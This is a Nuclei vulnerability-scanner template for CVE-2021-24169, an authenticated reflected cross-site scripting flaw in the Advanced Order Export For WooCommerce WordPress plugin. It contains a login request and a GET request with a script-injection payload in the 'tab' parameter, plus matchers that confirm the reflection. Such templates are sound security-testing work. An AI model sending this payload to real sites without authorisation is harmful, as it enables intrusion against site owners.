nuclei-templates/cves/2021/CVE-2021-24169.yaml

45 lines
1.5 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2021-24169
info:
name: Advanced Order Export For WooCommerce < 3.1.8 - Authenticated Reflected Cross-Site Scripting (XSS)
author: r3Y3r53
severity: medium
description: |
This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS.
reference:
- https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3
- https://www.exploit-db.com/exploits/50324
- https://wordpress.org/plugins/woo-order-export-lite/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24169
remediation: Fixed in version 3.1.8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24169
cwe-id: CWE-79
2023-03-05 13:42:10 +00:00
metadata:
verified: "true"
tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb
2023-03-05 13:42:10 +00:00
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "woo-order-export-lite")'
condition: and